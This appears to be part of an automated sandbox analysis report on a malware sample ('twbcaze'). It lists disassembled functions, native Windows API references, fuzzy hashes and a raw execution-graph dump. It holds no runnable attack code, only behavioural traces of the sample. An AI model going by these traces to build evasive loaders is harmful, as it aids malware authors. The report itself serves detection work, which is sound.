                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041D34F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID: ($C
                                          • API String ID: 269201875-3609345990
                                          • Opcode ID: 5705296c8f5e2ce6e54b2a6dd93835eae09c5fc4b394eee21e1016d4c2dcc879
                                          • Instruction ID: 589da761933b8489358107600bae34912bf1acc48a6383ebcc3d4a682aba7f87
                                          • Opcode Fuzzy Hash: 5705296c8f5e2ce6e54b2a6dd93835eae09c5fc4b394eee21e1016d4c2dcc879
                                          • Instruction Fuzzy Hash: 5F1181B1F002044BD7219F29BC45B967798AB10724F14263BE924CB3D2E778DAC2469E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404480 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040449B
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004044FC
                                            • Part of subcall function 0040E6AA: _Yarn.LIBCPMT ref: 0040E6C9
                                            • Part of subcall function 0040E6AA: _Yarn.LIBCPMT ref: 0040E6ED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                          • String ID: bad locale name
                                          • API String ID: 1908188788-1405518554
                                          • Opcode ID: 238c888e146f9155077e996780825bd2effd0d9b3f688fa335baba1fe65202fd
                                          • Instruction ID: 10351a998254b27a264eb5f60510b3b8a5f39e0114528638898faf0cfdb10de2
                                          • Opcode Fuzzy Hash: 238c888e146f9155077e996780825bd2effd0d9b3f688fa335baba1fe65202fd
                                          • Instruction Fuzzy Hash: 4C011B70D04108ABCB08FFA9D59166DBBB1EF8430CF04487EE74667782D6399A90CB5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040FD28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0040FD33
                                          • ___raise_securityfailure.LIBCMT ref: 0040FDF0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                          • String ID: UDA
                                          • API String ID: 3761405300-16305742
                                          • Opcode ID: 30c31e43d8885961e1ee9a641670382ed8a5f0ed8d9ae32863fd0d8a5714705e
                                          • Instruction ID: 426e22e72354b292b0491fa63b07e3ad4342c56be0c17f4280f2a8b488479637
                                          • Opcode Fuzzy Hash: 30c31e43d8885961e1ee9a641670382ed8a5f0ed8d9ae32863fd0d8a5714705e
                                          • Instruction Fuzzy Hash: EB119CB4612308DAD709EF16FA416403BE4BF18300F10B27AE828973A0E3F4A6419B9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00404582
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 004045CC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::_$Locinfo::_Locinfo_dtorLockitLockit::~_
                                          • String ID: BC@
                                          • API String ID: 3286764726-567795178
                                          • Opcode ID: 21a45f711aed31e2aa7e50a17d51986dc539f98cd72672fdc948f4672179dd05
                                          • Instruction ID: 30101b0a74aadc53a2af31f829cf8ca0d7754302c5aa35f51ee0d95304b8e84e
                                          • Opcode Fuzzy Hash: 21a45f711aed31e2aa7e50a17d51986dc539f98cd72672fdc948f4672179dd05
                                          • Instruction Fuzzy Hash: FDF0F970914108ABCB08FFA9E5A176DBB75AFC430CF44047ED646773C2DA38AAA09759
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004041C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 004041E4
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040420F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                          • String ID: P@@
                                          • API String ID: 593203224-358152503
                                          • Opcode ID: 723069e1172fbba5e3a5e2abb35d6cb8eeda4d52ad1c98415e35d9cc6dbfd666
                                          • Instruction ID: c631f8bb44a1fe621ce2e9bf2f5b6246a9635cf2995841f609c86c8e23acef46
                                          • Opcode Fuzzy Hash: 723069e1172fbba5e3a5e2abb35d6cb8eeda4d52ad1c98415e35d9cc6dbfd666
                                          • Instruction Fuzzy Hash: 7EF034B0E00108DFDB04EFA9E541BACB7F0FF08304F0004AAE815AB3A1D3746A94CB49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040E13C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                          Download Yara Rule
                                          APIs
                                          • AcquireSRWLockExclusive.KERNEL32(00432638,?,?,?,00402AF5,?,?,00402A88,?,004028C7), ref: 0040E147
                                          • ReleaseSRWLockExclusive.KERNEL32(00432638,?,?,?,00402AF5,?,?,00402A88,?,004028C7), ref: 0040E181
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExclusiveLock$AcquireRelease
                                          • String ID: 8&C
                                          • API String ID: 17069307-4180868660
                                          • Opcode ID: 91a97375c961c7277db80e4fd2ba5b8a695cbc517f5d1d5b28a7f96b48310684
                                          • Instruction ID: c7b64bba9b5cb3d732e833d916cabc7bf9407ba6fbd8089bec8ac7146b67c8bc
                                          • Opcode Fuzzy Hash: 91a97375c961c7277db80e4fd2ba5b8a695cbc517f5d1d5b28a7f96b48310684
                                          • Instruction Fuzzy Hash: C4F08C31201100DBC720AF26E804A6AB7A4EB49331F104A3FE9599B3E0C73858A3CA5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:1.7%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:6.3%
                                          Total number of Nodes:555
                                          Total number of Limit Nodes:64
                                          execution_graph 83261 41f080 83264 41b930 83261->83264 83265 41b956 83264->83265 83272 409d30 83265->83272 83267 41b962 83268 41b983 83267->83268 83280 40c1b0 83267->83280 83270 41b975 83316 41a670 83270->83316 83275 409d3d 83272->83275 83319 409c80 83272->83319 83274 409d44 83274->83267 83275->83274 83331 409c20 83275->83331 83281 40c1d5 83280->83281 83745 40b1b0 83281->83745 83283 40c22c 83749 40ae30 83283->83749 83285 40c252 83315 40c4a3 83285->83315 83758 414390 83285->83758 83287 40c297 83287->83315 83761 408a60 83287->83761 83289 40c2db 83289->83315 83768 41a4c0 83289->83768 83293 40c331 83294 40c338 83293->83294 83780 419fd0 83293->83780 83295 41bd80 2 API calls 83294->83295 83297 40c345 83295->83297 83297->83270 83298 40c375 83299 40c382 83298->83299 83302 40c392 83298->83302 83300 41bd80 2 API calls 83299->83300 83301 40c389 83300->83301 83301->83270 83303 40f490 4 API calls 83302->83303 83304 40c406 83303->83304 83304->83294 83305 40c411 83304->83305 83306 41bd80 2 API calls 83305->83306 83307 40c435 83306->83307 83787 41a020 83307->83787 83310 419fd0 3 API calls 83311 40c470 83310->83311 83311->83315 83792 419de0 83311->83792 83314 41a670 2 API calls 83314->83315 83315->83270 83317 41af20 LdrLoadDll 83316->83317 83318 41a68f ExitProcess 83317->83318 83318->83268 83320 409c93 83319->83320 83370 418b80 LdrLoadDll 83319->83370 83350 418a30 83320->83350 83323 409ca6 83323->83275 83324 409c9c 83324->83323 83353 41b270 83324->83353 83326 409ce3 83326->83323 83364 409aa0 83326->83364 83328 409d03 83371 409620 LdrLoadDll 83328->83371 83330 409d15 83330->83275 83332 409c3a 83331->83332 83333 41b560 LdrLoadDll 83331->83333 83720 41b560 83332->83720 83333->83332 83336 41b560 LdrLoadDll 83337 409c61 83336->83337 83338 40f170 83337->83338 83339 40f189 83338->83339 83728 40b030 83339->83728 83341 40f19c 83732 41a1a0 83341->83732 83345 40f1c2 83348 40f1ed 83345->83348 83738 41a220 83345->83738 83347 41a450 2 API calls 83349 409d55 83347->83349 83348->83347 83349->83267 83372 41a5c0 83350->83372 83354 41b289 83353->83354 83385 414a40 83354->83385 83356 41b2a1 83357 41b2aa 83356->83357 83424 41b0b0 83356->83424 83357->83326 83359 41b2be 83359->83357 83442 419ec0 83359->83442 83698 407ea0 83364->83698 83366 409ac1 83366->83328 83367 409aba 83367->83366 83711 408160 83367->83711 83370->83320 83371->83330 83375 41af20 83372->83375 83374 418a45 83374->83324 83376 41af30 83375->83376 83378 41af52 83375->83378 83379 414e40 83376->83379 83378->83374 83380 414e5a 83379->83380 83381 414e4e 83379->83381 83380->83378 83381->83380 83384 4152c0 LdrLoadDll 83381->83384 83383 414fac 83383->83378 83384->83383 83386 414d75 83385->83386 83387 414a54 83385->83387 83386->83356 83387->83386 83450 419c10 83387->83450 83390 414b80 83453 41a320 83390->83453 83391 414b63 83510 41a420 LdrLoadDll 83391->83510 83394 414ba7 83396 41bd80 2 API calls 83394->83396 83395 414b6d 83395->83356 83398 414bb3 83396->83398 83397 414d39 83400 41a450 2 API calls 83397->83400 83398->83395 83398->83397 83399 414d4f 83398->83399 83404 414c42 83398->83404 83519 414780 LdrLoadDll NtReadFile NtClose 83399->83519 83402 414d40 83400->83402 83402->83356 83403 414d62 83403->83356 83405 414ca9 83404->83405 83407 414c51 83404->83407 83405->83397 83406 414cbc 83405->83406 83512 41a2a0 83406->83512 83409 414c56 83407->83409 83410 414c6a 83407->83410 83511 414640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 83409->83511 83413 414c87 83410->83413 83414 414c6f 83410->83414 83413->83402 83468 414400 83413->83468 83456 4146e0 83414->83456 83416 414c60 83416->83356 83419 414d1c 83516 41a450 83419->83516 83420 414c7d 83420->83356 83421 414c9f 83421->83356 83423 414d28 83423->83356 83426 41b0c1 83424->83426 83425 41b0d3 83425->83359 83426->83425 83538 41bd00 83426->83538 83428 41b0f4 83541 414060 83428->83541 83430 41b140 83430->83359 83431 41b117 83431->83430 83432 414060 3 API calls 83431->83432 83433 41b139 83432->83433 83433->83430 83572 415380 83433->83572 83435 41b1ca 83436 41b1da 83435->83436 83666 41aec0 LdrLoadDll 83435->83666 83582 41ad30 83436->83582 83439 41b208 83661 419e80 83439->83661 83443 41af20 LdrLoadDll 83442->83443 83444 419edc 83443->83444 83694 83fae8 LdrInitializeThunk 83444->83694 83445 419ef7 83447 41bd80 83445->83447 83448 41b319 83447->83448 83695 41a630 83447->83695 83448->83326 83451 414b34 83450->83451 83452 41af20 LdrLoadDll 83450->83452 83451->83390 83451->83391 83451->83395 83452->83451 83454 41af20 LdrLoadDll 83453->83454 83455 41a33c NtCreateFile 83454->83455 83455->83394 83457 4146fc 83456->83457 83458 41a2a0 LdrLoadDll 83457->83458 83459 41471d 83458->83459 83460 414724 83459->83460 83461 414738 83459->83461 83463 41a450 2 API calls 83460->83463 83462 41a450 2 API calls 83461->83462 83464 414741 83462->83464 83465 41472d 83463->83465 83520 41bf90 LdrLoadDll RtlAllocateHeap 83464->83520 83465->83420 83467 41474c 83467->83420 83469 41444b 83468->83469 83473 41447e 83468->83473 83471 41a2a0 LdrLoadDll 83469->83471 83470 4145c9 83474 41a2a0 LdrLoadDll 83470->83474 83472 414466 83471->83472 83475 41a450 2 API calls 83472->83475 83473->83470 83476 41449a 83473->83476 83480 4145e4 83474->83480 83477 41446f 83475->83477 83478 41a2a0 LdrLoadDll 83476->83478 83477->83421 83479 4144b5 83478->83479 83482 4144d1 83479->83482 83483 4144bc 83479->83483 83534 41a2e0 LdrLoadDll 83480->83534 83486 4144d6 83482->83486 83487 4144ec 83482->83487 83485 41a450 2 API calls 83483->83485 83484 41461e 83488 41a450 2 API calls 83484->83488 83489 4144c5 83485->83489 83490 41a450 2 API calls 83486->83490 83495 4144f1 83487->83495 83521 41bf50 83487->83521 83491 414629 83488->83491 83489->83421 83492 4144df 83490->83492 83491->83421 83492->83421 83503 414503 83495->83503 83524 41a3d0 83495->83524 83496 414557 83497 41456e 83496->83497 83533 41a260 LdrLoadDll 83496->83533 83499 414575 83497->83499 83500 41458a 83497->83500 83501 41a450 2 API calls 83499->83501 83502 41a450 2 API calls 83500->83502 83501->83503 83504 414593 83502->83504 83503->83421 83505 4145bf 83504->83505 83528 41bb50 83504->83528 83505->83421 83507 4145aa 83508 41bd80 2 API calls 83507->83508 83509 4145b3 83508->83509 83509->83421 83510->83395 83511->83416 83513 41af20 LdrLoadDll 83512->83513 83514 414d04 83513->83514 83515 41a2e0 LdrLoadDll 83514->83515 83515->83419 83517 41a46c NtClose 83516->83517 83518 41af20 LdrLoadDll 83516->83518 83517->83423 83518->83517 83519->83403 83520->83467 83523 41bf68 83521->83523 83535 41a5f0 83521->83535 83523->83495 83525 41a3da 83524->83525 83526 41af20 LdrLoadDll 83525->83526 83527 41a3ec NtReadFile 83526->83527 83527->83496 83529 41bb74 83528->83529 83530 41bb5d 83528->83530 83529->83507 83530->83529 83531 41bf50 2 API calls 83530->83531 83532 41bb8b 83531->83532 83532->83507 83533->83497 83534->83484 83536 41af20 LdrLoadDll 83535->83536 83537 41a60c RtlAllocateHeap 83536->83537 83537->83523 83539 41bd2d 83538->83539 83667 41a500 83538->83667 83539->83428 83542 414063 83541->83542 83571 414071 83542->83571 83670 41cef0 83542->83670 83544 4140cd 83545 41cef0 2 API calls 83544->83545 83548 4140d8 83545->83548 83546 414126 83549 41cef0 2 API calls 83546->83549 83548->83546 83550 41d020 3 API calls 83548->83550 83681 41cf90 LdrLoadDll RtlAllocateHeap RtlFreeHeap 83548->83681 83552 41413a 83549->83552 83550->83548 83551 414197 83553 41cef0 2 API calls 83551->83553 83552->83551 83675 41d020 83552->83675 83559 4141ad 83553->83559 83555 4141ea 83556 41cef0 2 API calls 83555->83556 83558 4141f5 83556->83558 83557 41d020 3 API calls 83557->83559 83560 41d020 3 API calls 83558->83560 83566 41422f 83558->83566 83559->83555 83559->83557 83560->83558 83562 414324 83683 41cf50 LdrLoadDll RtlFreeHeap 83562->83683 83564 41432e 83684 41cf50 LdrLoadDll RtlFreeHeap 83564->83684 83682 41cf50 LdrLoadDll RtlFreeHeap 83566->83682 83567 414338 83685 41cf50 LdrLoadDll RtlFreeHeap 83567->83685 83569 414342 83686 41cf50 LdrLoadDll RtlFreeHeap 83569->83686 83571->83431 83573 415391 83572->83573 83574 414a40 9 API calls 83573->83574 83576 4153a7 83574->83576 83575 4153fa 83575->83435 83576->83575 83577 4153e2 83576->83577 83578 4153f5 83576->83578 83579 41bd80 2 API calls 83577->83579 83580 41bd80 2 API calls 83578->83580 83581 4153e7 83579->83581 83580->83575 83581->83435 83583 41ad44 83582->83583 83584 41abf0 LdrLoadDll 83582->83584 83687 41abf0 83583->83687 83584->83583 83587 41abf0 LdrLoadDll 83588 41ad56 83587->83588 83589 41abf0 LdrLoadDll 83588->83589 83590 41ad5f 83589->83590 83591 41abf0 LdrLoadDll 83590->83591 83592 41ad68 83591->83592 83593 41abf0 LdrLoadDll 83592->83593 83594 41ad71 83593->83594 83595 41abf0 LdrLoadDll 83594->83595 83596 41ad7d 83595->83596 83597 41abf0 LdrLoadDll 83596->83597 83598 41ad86 83597->83598 83599 41abf0 LdrLoadDll 83598->83599 83600 41ad8f 83599->83600 83601 41abf0 LdrLoadDll 83600->83601 83602 41ad98 83601->83602 83603 41abf0 LdrLoadDll 83602->83603 83604 41ada1 83603->83604 83605 41abf0 LdrLoadDll 83604->83605 83606 41adaa 83605->83606 83607 41abf0 LdrLoadDll 83606->83607 83608 41adb6 83607->83608 83609 41abf0 LdrLoadDll 83608->83609 83610 41adbf 83609->83610 83611 41abf0 LdrLoadDll 83610->83611 83612 41adc8 83611->83612 83613 41abf0 LdrLoadDll 83612->83613 83614 41add1 83613->83614 83615 41abf0 LdrLoadDll 83614->83615 83616 41adda 83615->83616 83617 41abf0 LdrLoadDll 83616->83617 83618 41ade3 83617->83618 83619 41abf0 LdrLoadDll 83618->83619 83620 41adef 83619->83620 83621 41abf0 LdrLoadDll 83620->83621 83622 41adf8 83621->83622 83623 41abf0 LdrLoadDll 83622->83623 83624 41ae01 83623->83624 83625 41abf0 LdrLoadDll 83624->83625 83626 41ae0a 83625->83626 83627 41abf0 LdrLoadDll 83626->83627 83628 41ae13 83627->83628 83629 41abf0 LdrLoadDll 83628->83629 83630 41ae1c 83629->83630 83631 41abf0 LdrLoadDll 83630->83631 83632 41ae28 83631->83632 83633 41abf0 LdrLoadDll 83632->83633 83634 41ae31 83633->83634 83635 41abf0 LdrLoadDll 83634->83635 83636 41ae3a 83635->83636 83637 41abf0 LdrLoadDll 83636->83637 83638 41ae43 83637->83638 83639 41abf0 LdrLoadDll 83638->83639 83640 41ae4c 83639->83640 83641 41abf0 LdrLoadDll 83640->83641 83642 41ae55 83641->83642 83643 41abf0 LdrLoadDll 83642->83643 83644 41ae61 83643->83644 83645 41abf0 LdrLoadDll 83644->83645 83646 41ae6a 83645->83646 83647 41abf0 LdrLoadDll 83646->83647 83648 41ae73 83647->83648 83649 41abf0 LdrLoadDll 83648->83649 83650 41ae7c 83649->83650 83651 41abf0 LdrLoadDll 83650->83651 83652 41ae85 83651->83652 83653 41abf0 LdrLoadDll 83652->83653 83654 41ae8e 83653->83654 83655 41abf0 LdrLoadDll 83654->83655 83656 41ae9a 83655->83656 83657 41abf0 LdrLoadDll 83656->83657 83658 41aea3 83657->83658 83659 41abf0 LdrLoadDll 83658->83659 83660 41aeac 83659->83660 83660->83439 83662 41af20 LdrLoadDll 83661->83662 83663 419e9c 83662->83663 83693 83fdc0 LdrInitializeThunk 83663->83693 83664 419eb3 83664->83359 83666->83436 83668 41af20 LdrLoadDll 83667->83668 83669 41a51c NtAllocateVirtualMemory 83668->83669 83669->83539 83671 41cf00 83670->83671 83672 41cf06 83670->83672 83671->83544 83673 41bf50 2 API calls 83672->83673 83674 41cf2c 83673->83674 83674->83544 83676 41cf90 83675->83676 83677 41bf50 2 API calls 83676->83677 83678 41cfed 83676->83678 83679 41cfca 83677->83679 83678->83552 83680 41bd80 2 API calls 83679->83680 83680->83678 83681->83548 83682->83562 83683->83564 83684->83567 83685->83569 83686->83571 83688 41ac0b 83687->83688 83689 414e40 LdrLoadDll 83688->83689 83690 41ac2b 83689->83690 83691 414e40 LdrLoadDll 83690->83691 83692 41acd7 83690->83692 83691->83692 83692->83587 83693->83664 83694->83445 83696 41af20 LdrLoadDll 83695->83696 83697 41a64c RtlFreeHeap 83696->83697 83697->83448 83699 407eb0 83698->83699 83700 407eab 83698->83700 83701 41bd00 2 API calls 83699->83701 83700->83367 83702 407ed5 83701->83702 83703 407f38 83702->83703 83704 419e80 2 API calls 83702->83704 83705 407f3e 83702->83705 83709 41bd00 2 API calls 83702->83709 83714 41a580 83702->83714 83703->83367 83704->83702 83707 407f64 83705->83707 83708 41a580 2 API calls 83705->83708 83707->83367 83710 407f55 83708->83710 83709->83702 83710->83367 83712 41a580 2 API calls 83711->83712 83713 40817e 83712->83713 83713->83328 83715 41a59c 83714->83715 83716 41af20 LdrLoadDll 83714->83716 83719 83fb68 LdrInitializeThunk 83715->83719 83716->83715 83717 41a5b3 83717->83702 83719->83717 83721 41b583 83720->83721 83724 40ace0 83721->83724 83725 40ad04 83724->83725 83726 409c4b 83725->83726 83727 40ad40 LdrLoadDll 83725->83727 83726->83336 83727->83726 83730 40b053 83728->83730 83729 40b0d0 83729->83341 83730->83729 83743 419c50 LdrLoadDll 83730->83743 83733 41af20 LdrLoadDll 83732->83733 83734 40f1ab 83733->83734 83734->83349 83735 41a790 83734->83735 83736 41af20 LdrLoadDll 83735->83736 83737 41a7af LookupPrivilegeValueW 83736->83737 83737->83345 83739 41af20 LdrLoadDll 83738->83739 83740 41a23c 83739->83740 83744 83fed0 LdrInitializeThunk 83740->83744 83741 41a25b 83741->83348 83743->83729 83744->83741 83746 40b1e0 83745->83746 83747 40b030 LdrLoadDll 83746->83747 83748 40b1f4 83747->83748 83748->83283 83750 40ae41 83749->83750 83751 40ae3d 83749->83751 83752 40ae8c 83750->83752 83753 40ae5a 83750->83753 83751->83285 83798 419c90 LdrLoadDll 83752->83798 83797 419c90 LdrLoadDll 83753->83797 83755 40ae9d 83755->83285 83757 40ae7c 83757->83285 83759 4143b6 83758->83759 83760 40f490 4 API calls 83758->83760 83759->83287 83760->83759 83762 408a79 83761->83762 83799 4087a0 83761->83799 83764 4087a0 19 API calls 83762->83764 83767 408a9d 83762->83767 83765 408a8a 83764->83765 83765->83767 83817 40f700 11 API calls 83765->83817 83767->83289 83769 41af20 LdrLoadDll 83768->83769 83770 41a4dc 83769->83770 83936 83fea0 LdrInitializeThunk 83770->83936 83771 40c312 83773 40f490 83771->83773 83774 40f4ad 83773->83774 83937 419f80 83774->83937 83777 40f4f5 83777->83293 83778 419fd0 3 API calls 83779 40f51e 83778->83779 83779->83293 83781 41af20 LdrLoadDll 83780->83781 83782 419fec 83781->83782 83944 83fc60 LdrInitializeThunk 83782->83944 83783 41a01b 83783->83298 83945 83fc90 LdrInitializeThunk 83783->83945 83784 41a04b 83784->83298 83788 41af20 LdrLoadDll 83787->83788 83789 41a03c 83788->83789 83946 83fc90 LdrInitializeThunk 83789->83946 83790 40c449 83790->83310 83793 41af20 LdrLoadDll 83792->83793 83794 419dfc 83793->83794 83947 840078 LdrInitializeThunk 83794->83947 83795 40c49c 83795->83314 83797->83757 83798->83755 83800 407ea0 4 API calls 83799->83800 83805 4087ba 83799->83805 83800->83805 83801 408a49 83801->83762 83802 408a3f 83803 408160 2 API calls 83802->83803 83803->83801 83805->83801 83805->83802 83807 419ec0 2 API calls 83805->83807 83809 41a450 LdrLoadDll NtClose 83805->83809 83812 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 83805->83812 83815 419de0 2 API calls 83805->83815 83818 419cd0 83805->83818 83821 4085d0 83805->83821 83833 40f5e0 LdrLoadDll NtClose 83805->83833 83834 419d50 LdrLoadDll 83805->83834 83835 419d80 LdrLoadDll 83805->83835 83836 419e10 LdrLoadDll 83805->83836 83837 4083a0 83805->83837 83853 405f60 LdrLoadDll 83805->83853 83807->83805 83809->83805 83812->83805 83815->83805 83817->83767 83819 419cec 83818->83819 83820 41af20 LdrLoadDll 83818->83820 83819->83805 83820->83819 83822 4085e6 83821->83822 83854 419840 83822->83854 83824 4085ff 83829 408771 83824->83829 83875 4081a0 83824->83875 83826 4086e5 83827 4083a0 12 API calls 83826->83827 83826->83829 83828 408713 83827->83828 83828->83829 83830 419ec0 2 API calls 83828->83830 83829->83805 83831 408748 83830->83831 83831->83829 83832 41a4c0 2 API calls 83831->83832 83832->83829 83833->83805 83834->83805 83835->83805 83836->83805 83838 4083c9 83837->83838 83915 408310 83838->83915 83841 41a4c0 2 API calls 83842 4083dc 83841->83842 83842->83841 83843 408467 83842->83843 83846 408462 83842->83846 83923 40f660 83842->83923 83843->83805 83844 41a450 2 API calls 83845 40849a 83844->83845 83845->83843 83847 419cd0 LdrLoadDll 83845->83847 83846->83844 83848 4084ff 83847->83848 83848->83843 83927 419d10 83848->83927 83850 408563 83850->83843 83851 414a40 9 API calls 83850->83851 83852 4085b8 83851->83852 83852->83805 83853->83805 83855 41bf50 2 API calls 83854->83855 83856 419857 83855->83856 83882 409310 83856->83882 83858 419872 83859 4198b0 83858->83859 83860 419899 83858->83860 83862 41bd00 2 API calls 83859->83862 83861 41bd80 2 API calls 83860->83861 83863 4198a6 83861->83863 83864 4198ea 83862->83864 83863->83824 83865 41bd00 2 API calls 83864->83865 83866 419903 83865->83866 83872 419ba4 83866->83872 83888 41bd40 83866->83888 83869 419b90 83870 41bd80 2 API calls 83869->83870 83871 419b9a 83870->83871 83871->83824 83873 41bd80 2 API calls 83872->83873 83874 419bf9 83873->83874 83874->83824 83876 40829f 83875->83876 83877 4081b5 83875->83877 83876->83826 83877->83876 83878 414a40 9 API calls 83877->83878 83880 408222 83878->83880 83879 408249 83879->83826 83880->83879 83881 41bd80 2 API calls 83880->83881 83881->83879 83883 409335 83882->83883 83884 40ace0 LdrLoadDll 83883->83884 83885 409368 83884->83885 83887 40938d 83885->83887 83891 40cf10 83885->83891 83887->83858 83909 41a540 83888->83909 83892 40cf3c 83891->83892 83893 41a1a0 LdrLoadDll 83892->83893 83894 40cf55 83893->83894 83895 40cf5c 83894->83895 83902 41a1e0 83894->83902 83895->83887 83899 40cf97 83900 41a450 2 API calls 83899->83900 83901 40cfba 83900->83901 83901->83887 83903 41a1fc 83902->83903 83904 41af20 LdrLoadDll 83902->83904 83908 83fbb8 LdrInitializeThunk 83903->83908 83904->83903 83905 40cf7f 83905->83895 83907 41a7d0 LdrLoadDll 83905->83907 83907->83899 83908->83905 83910 41af20 LdrLoadDll 83909->83910 83911 41a55c 83910->83911 83914 840048 LdrInitializeThunk 83911->83914 83912 419b89 83912->83869 83912->83872 83914->83912 83916 408328 83915->83916 83917 40ace0 LdrLoadDll 83916->83917 83918 408343 83917->83918 83919 414e40 LdrLoadDll 83918->83919 83920 408353 83919->83920 83921 40835c PostThreadMessageW 83920->83921 83922 40836c 83920->83922 83921->83922 83922->83842 83924 40f673 83923->83924 83930 419e50 83924->83930 83928 41af20 LdrLoadDll 83927->83928 83929 419d2c 83928->83929 83929->83850 83931 41af20 LdrLoadDll 83930->83931 83932 419e6c 83931->83932 83935 83fd8c LdrInitializeThunk 83932->83935 83933 40f69e 83933->83842 83935->83933 83936->83771 83938 419f86 83937->83938 83939 41af20 LdrLoadDll 83938->83939 83940 419f9c 83939->83940 83943 83ffb4 LdrInitializeThunk 83940->83943 83941 40f4ee 83941->83777 83941->83778 83943->83941 83944->83783 83945->83784 83946->83790 83947->83795 83950 83f900 LdrInitializeThunk

                                          Executed Functions

                                          Function 0041A3D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
